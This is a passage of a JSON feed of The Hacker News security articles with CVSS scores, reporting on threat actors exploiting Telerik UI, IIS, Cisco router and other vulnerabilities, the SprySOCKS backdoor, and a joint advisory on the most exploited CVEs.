\n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-01T14:55:00", "type": "thn", "title": "Unmasking XE Group: Experts Reveal Identity of Suspected Cybercrime Kingpin", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2023-06-01T14:55:37", "id": "THN:E9A6FFB34DA1C49F512A7AE269951D50", "href": "https://thehackernews.com/2023/06/unmasking-xe-group-experts-reveal.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[![APT Hacking Group](https://thehackernews.com/images/-aPh3AyK7bqc/YQfQByUmHnI/AAAAAAAADaU/NmwrUQl8ZRcRsgL1Y2FPj8U64wKdrMlLACLcBGAsYHQ/s728-e1000/apt-hacker.jpg)](<https://thehackernews.com/images/-aPh3AyK7bqc/YQfQByUmHnI/AAAAAAAADaU/NmwrUQl8ZRcRsgL1Y2FPj8U64wKdrMlLACLcBGAsYHQ/s0/apt-hacker.jpg>)\n\nA new highly capable and persistent threat actor has been targeting major high-profile public and private entities in the U.S. as part of a series of targeted cyber intrusion attacks by exploiting internet-facing Microsoft Internet Information Services ([IIS](<https://en.wikipedia.org/wiki/Internet_Information_Services>)) servers to infiltrate their networks.\n\nIsraeli cybersecurity firm Sygnia, which identified the campaign, is tracking the advanced, stealthy adversary under the moniker \"Praying Mantis\" or \"TG2021.\"\n\n\"TG1021 uses a custom-made malware framework, built around a common core, tailor-made for IIS servers. The toolset is completely volatile, reflectively loaded into an affected machine's memory and leaves little-to-no trace on infected targets,\" the researchers [said](<https://www.sygnia.co/praying-mantis-targeted-apt>). \"The threat actor also uses an additional stealthy backdoor and several post-exploitations modules to perform network reconnaissance, elevate privileges, and move laterally within networks.\" \n\n[![APT Hacking Group](https://thehackernews.com/images/-ZP-P4VwOZxI/YQfQWTuCuiI/AAAAAAAADac/u-zO1cQst2UuJ9lV7I9J_dj369CMBpmhgCLcBGAsYHQ/s728-e1000/hacker-attack.jpg)](<https://thehackernews.com/images/-ZP-P4VwOZxI/YQfQWTuCuiI/AAAAAAAADac/u-zO1cQst2UuJ9lV7I9J_dj369CMBpmhgCLcBGAsYHQ/s0/hacker-attack.jpg>)\n\nBesides exhibiting capabilities that show a significant effort to avoid detection by actively interfering with logging mechanisms and successfully evading commercial endpoint detection and response (EDR) systems, the threat actor has been known to leverage an arsenal of ASP.NET web application exploits to gain an initial foothold and backdoor the servers by executing a sophisticated implant named \"NodeIISWeb\" that's designed to load custom DLLs as well as intercept and handle HTTP requests received by the server.\n\n[![APT Hacking Group](https://thehackernews.com/images/-50djfDO2Prg/YQfQlpOifCI/AAAAAAAADag/Zr7kLjdvhak0dndsJENUEv_mJYyfng4hwCLcBGAsYHQ/s728-e1000/hacking-news.jpg)](<https://thehackernews.com/images/-50djfDO2Prg/YQfQlpOifCI/AAAAAAAADag/Zr7kLjdvhak0dndsJENUEv_mJYyfng4hwCLcBGAsYHQ/s0/hacking-news.jpg>)\n\nThe vulnerabilities that are taken advantage of by the actor include:\n\n * Checkbox Survey RCE Exploit ([CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>))\n * VIEWSTATE Deserialization Exploit\n * Altserialization Insecure Deserialization\n * Telerik-UI Exploit ([CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) and [CVE-2017-11317](<https://nvd.nist.gov/vuln/detail/CVE-2017-11317>))\n\nInterestingly, Sygnia's investigation into TG1021's tactics, techniques, and procedures (TTPs) have unearthed \"major overlaps\" to those of a nation-sponsored actor named \"[Copy-Paste Compromises](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf>),\" as detailed in an advisory released by the Australian Cyber Security Centre (ACSC) in June 2020, which described a cyber campaign targeting public-facing infrastructure primarily through the use of unpatched flaws in Telerik UI and IIS servers. However, a formal attribution is yet to be made.\n\n\"Praying Mantis, which has been observed targeting high-profile public and private entities in two major Western markets, exemplifies a growing trend of cyber criminals using sophisticated, nation-state attack methods to target commercial organizations,\" the researchers said. \"Continuous forensics activities and timely incident response are essential to identifying and effectively defending networks from attacks by similar threat actors.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-02T11:11:00", "type": "thn", "title": "New APT Hacking Group Targets Microsoft IIS Servers with ASP.NET Exploits", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935", "CVE-2021-27852"], "modified": "2022-02-23T04:34:16", "id": "THN:942BFBB34DF6A24E460572684F648005", "href": "https://thehackernews.com/2021/08/new-apt-hacking-group-targets-microsoft.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-16T15:00:20", "description": "[![Vulnerability](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEitNpFZ-FwCLnE7wwqvAOi4PyjoaRJ-Soa_w01roGQa-eaSzW5BQiT1c4LSlmx5ikxEyb8Qm8WX8h5rdLlu_DfGU-HSH4oaEyP5ZPYybWyhrmfd8zdzYilp4sKiCs_bnPNbrWchF9X7a8Fa0pVLrRSTt6NnQxAPzGh-Tm0V1HnAudhCzMfxVVmsNSXs/s728-e365/united.jpg>)\n\nMultiple threat actors, including a nation-state group, exploited a critical three-year-old security flaw in Progress Telerik to break into an unnamed federal entity in the U.S.\n\nThe [disclosure](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-074a>) comes from a [joint advisory](<https://www.cisa.gov/news-events/analysis-reports/ar23-074a>) issued by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC).\n\n\"Exploitation of this vulnerability allowed malicious actors to successfully execute remote code on a federal civilian executive branch (FCEB) agency's Microsoft Internet Information Services (IIS) web server,\" the agencies [said](<https://www.cisa.gov/news-events/alerts/2023/03/15/threat-actors-exploited-progress-telerik-vulnerability-us-government-iis-server>).\n\nThe indicators of compromise (IoCs) associated with the digital break-in were identified from November 2022 through early January 2023.\n\nTracked as [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8), the issue relates to a .NET [deserialization vulnerability](<https://www.mandiant.com/resources/blog/hunting-deserialization-exploits>) affecting Progress Telerik UI for ASP.NET AJAX that, if left unpatched, could [lead to remote code execution](<https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui>).\n\nIt's worth noting here that CVE-2019-18935 has previously found a place among some of the [most commonly](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) [exploited vulnerabilities](<https://thehackernews.com/2021/07/top-30-critical-security.html>) abused by various threat actors in 2020 and 2021.\n\nCVE-2019-18935, in conjunction with [CVE-2017-11317](<https://nvd.nist.gov/vuln/detail/CVE-2017-11317>), has also been weaponized by a threat actor tracked as [Praying Mantis](<https://thehackernews.com/2021/08/new-apt-hacking-group-targets-microsoft.html>) (aka TG2021) to infiltrate the networks of public and private organizations in the U.S.\n\nLast month, CISA also [added](<https://thehackernews.com/2023/02/cisa-alert-oracle-e-business-suite-and.html>) [CVE-2017-11357](<https://nvd.nist.gov/vuln/detail/CVE-2017-11357>) \u2013 another remote code execution bug affecting Telerik UI \u2013 to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.\n\nIn the intrusion recorded against the FCEB agency in August 2022, the threat actors are said to have leveraged CVE-2019-18935 to upload and execute malicious dynamic-link library (DLL) files masquerading as PNG images via the [w3wp.exe process](<https://attack.mitre.org/techniques/T1505/004/>).\n\nThe DLL artifacts are designed to gather system information, load additional libraries, enumerate files and processes, and exfiltrate the data back to a remote server.\n\nAnother set of attacks, observed as early as August 2021 and likely mounted by a cybercriminal actor dubbed [XE Group](<https://www.volexity.com/blog/2021/12/07/xe-group-exposed-8-years-of-hacking-card-skimming-for-profit/>), entailed the use of aforementioned evasion techniques to sidestep detection.\n\nThese DLL files dropped and executed reverse (remote) shell utilities for unencrypted communications with a command-and-control domain to drop additional payloads, including an ASPX web shell for persistent backdoor access.\n\nThe web shell is equipped to \"enumerate drives; to send, receive, and delete files; and to execute incoming commands\" and \"contains an interface for easily browsing files, directories, or drives on the system, and allows the user to upload or download files to any directory.\"\n\nTo counter such attacks, it's recommended that organizations upgrade their instances of Telerik UI ASP.NET AJAX to the latest version, implement network segmentation, and enforce phishing-resistant multi-factor authentication for accounts that have privileged access.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-16T06:34:00", "type": "thn", "title": "Multiple Hacker Groups Exploit 3-Year-Old Vulnerability to Breach U.S. Federal Agency", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2023-03-16T13:32:35", "id": "THN:B5B2AEA40FC2AB866E27855C79D1CDDA", "href": "https://thehackernews.com/2023/03/multiple-hacker-groups-exploit-3-year.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:16", "description": "[![Small Business VPN Router](https://thehackernews.com/images/-Ji1h3SW3gx4/YQt-bszDtjI/AAAAAAAADc4/CGH7QqEhtv82ZiNPedwsnP6swE8w3RKkwCLcBGAsYHQ/s728-e1000/cisco.jpg)](<https://thehackernews.com/images/-Ji1h3SW3gx4/YQt-bszDtjI/AAAAAAAADc4/CGH7QqEhtv82ZiNPedwsnP6swE8w3RKkwCLcBGAsYHQ/s0/cisco.jpg>)\n\nNetworking equipment major Cisco has rolled out patches to address critical vulnerabilities impacting its Small Business VPN routers that could be abused by a remote attacker to execute arbitrary code and even cause a denial-of-service (DoS) condition.\n\nThe issues, tracked as CVE-2021-1609 (CVSS score: 9.8) and CVE-2021-1610 (CVSS score: 7.2), reside in the web-based management interface of the Small Business RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers running a firmware release prior to version 1.0.03.22. Both the issues stem from a lack of proper validation of HTTP requests, thus permitting a bad actor to send a specially-crafted HTTP request to a vulnerable device.\n\nSuccessful exploitation of CVE-2021-1609 could allow an unauthenticated, remote attacker to execute arbitrary code on the device or cause the device to reload, resulting in a DoS condition. CVE-2021-1610, concerns a command injection vulnerability that, if exploited, could permit an authenticated adversary to remotely execute arbitrary commands with root privileges on an affected device, the company [noted](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv340-cmdinj-rcedos-pY8J3qfy>) in its advisory.\n\nSwing of Chaitin Security Research Lab has been credited with reporting the two shortcomings.\n\nAlso addressed by Cisco is a high-severity remote code execution bug (CVE-2021-1602, CVSS score: 8.2) impacting Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers that could be leveraged by an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. Small Business RV Series Routers running firmware versions earlier than 1.0.01.04 are susceptible.\n\n\"This vulnerability is due to insufficient user input validation. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface,\" Cisco [said](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-code-execution-9UVJr7k4>). \"A successful exploit could allow the attacker to execute arbitrary commands on an affected device using root-level privileges. Due to the nature of the vulnerability, only commands without parameters can be executed.\"\n\nThe company noted there's been no evidence of active exploitation attempts in the wild for any of these flaws, nor are there any workarounds that address the vulnerabilities.\n\nCVE-2021-1602 marks the second time Cisco has fixed critical remote code execution flaws concerning the same set of VPN appliances. Earlier this February, the company [patched 35 flaws](<https://thehackernews.com/2021/02/critical-flaws-reported-in-cisco-vpn.html>) that could potentially allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-05T06:02:00", "type": "thn", "title": "Cisco Issues Critical Security Patches to Fix Small Business VPN Router Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1602", "CVE-2021-1609", "CVE-2021-1610"], "modified": "2021-08-05T06:02:59", "id": "THN:DA123F44DF01FC15E8AB38B124B06368", "href": "https://thehackernews.com/2021/08/cisco-issues-critical-security-patches.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-20T06:36:12", "description": "[![Linux Backdoor](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgQDtvVYWQtWzE06-mzWNMzLWKyyf2DL3GdVtvIyoUB4Dwam-Kn4OOyoxspK2sJ9fUp89SLfPa-25jL7VAYj-sf-NvNTr8ik16TJFB3bVM3Q6ganCFUtw3iKgeNf6cO01HJ1NJUZquLJ_R0g8u9NJrOTH1Siy0sYXulAtYsqWBERdKDDNQTUD767CW0cAS-/s728-e365/linu-malware.jpg>)\n\nThe China-linked threat actor known as **Earth Lusca** has been observed targeting government entities using a never-before-seen Linux backdoor called SprySOCKS.\n\nEarth Lusca was [first documented](<https://thehackernews.com/2022/01/earth-lusca-hackers-aimed-at-high-value.html>) by Trend Micro in January 2022, detailing the adversary's attacks against public and private sector entities across Asia, Australia, Europe, North America.\n\nActive since 2021, the group has relied on spear-phishing and watering hole attacks to pull off its cyber espionage schemes. Some activities of the group overlap with another threat cluster tracked by Recorded Future under the name [RedHotel](<https://thehackernews.com/2023/08/china-linked-hackers-strike-worldwide.html>).\n\nThe latest findings from the cybersecurity firm show that Earth Lusca continues to be an active group, even expanding its operations to target organizations across the world during the first half of 2023.\n\nPrimary targets include government departments that are involved in foreign affairs, technology, and telecommunications. The attacks are concentrated in Southeast Asia, Central Asia, and the Balkans.\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/o6a5Vxgy> \"Cybersecurity\" )\n\nInfection sequences start with the exploitation of known security flaws in public-facing Fortinet (CVE-2022-39952 and CVE-2022-40684), GitLab (CVE-2021-22205), Microsoft Exchange Server (ProxyShell), Progress Telerik UI (CVE-2019-18935), and Zimbra (CVE-2019-9621 and CVE-2019-9670) servers to drop web shells and deliver Cobalt Strike for lateral movement.\n\n\"The group intends to exfiltrate documents and email account credentials, as well as to further deploy advanced backdoors like [ShadowPad](<https://thehackernews.com/2023/09/chinese-redfly-group-compromised.html>) and the Linux version of [Winnti](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti>) to conduct long-term espionage activities against its targets,\" security researchers Joseph C. Chen and Jaromir Horejsi [said](<https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html>).\n\nThe server used to deliver Cobalt Strike and Winnti has also been observed to host SprySOCKS, which has its roots in the open-source Windows backdoor [Trochilus](<https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat>). It's worth noting that the use of Trochilus has been tied to a Chinese hacking crew called [Webworm](<https://thehackernews.com/2022/09/webworm-hackers-using-modified-rats-in.html>) in the past.\n\nLoaded by means of a variant of an ELF injector component known as [mandibule](<https://github.com/ixty/mandibule>), SprySOCKS is equipped to gather system information, start an interactive shell, create and terminate SOCKS proxy, and perform various file and directory operations.\n\nUPCOMING WEBINAR\n\n[Level-Up SaaS Security: A Comprehensive Guide to ITDR and SSPM\n\n](<https://thehacker.news/itdr-saas?source=inside>)\n\nStay ahead with actionable insights on how ITDR identifies and mitigates threats. Learn about the indispensable role of SSPM in ensuring your identity remains unbreachable.\n\n[Supercharge Your Skills](<https://thehacker.news/itdr-saas?source=inside>)\n\nThe interactive shell implementation in SprySOCKS is likely inspired by the Linux version of a fully-featured backdoor named [Derusbi](<https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi>) (aka Photo) that's known to be employed by multiple Chinese threat activity clusters since at least 2008.\n\nCommand-and-control (C2) communication consists of packets sent via the Transmission Control Protocol (TCP) protocol, mirroring a structure used by a [Windows-based trojan](<https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html>) referred to as [RedLeaves](<https://www.trendmicro.com/en_us/research/17/g/chessmaster-cyber-espionage-campaign.html>), itself said to be built on top of Trochilus.\n\nAt least two different samples of SprySOCKS (versions 1.1 and 1.3.6) have been identified to date, suggesting that the malware is being continually modified by the attackers to add new features.\n\n\"It is important that organizations proactively manage their attack surface, minimizing the potential entry points into their system and reducing the likelihood of a successful breach,\" the researchers said.\n\n\"Businesses should regularly apply patches and update their tools, software, and systems to ensure their security, functionality, and overall performance.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-09-19T11:10:00", "type": "thn", "title": "Earth Lusca's New SprySOCKS Linux Backdoor Targets Government Entities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935", "CVE-2019-9621", "CVE-2019-9670", "CVE-2021-22205", "CVE-2022-39952", "CVE-2022-40684"], "modified": "2023-09-20T04:37:37", "id": "THN:3B0CBDDCB6FCC241176B94BC03E008BA", "href": "https://thehackernews.com/2023/09/earth-luscas-new-sprysocks-linux.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[![Security Vulnerabilities](https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s728-e1000/Security-Vulnerabilities.jpg)](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and 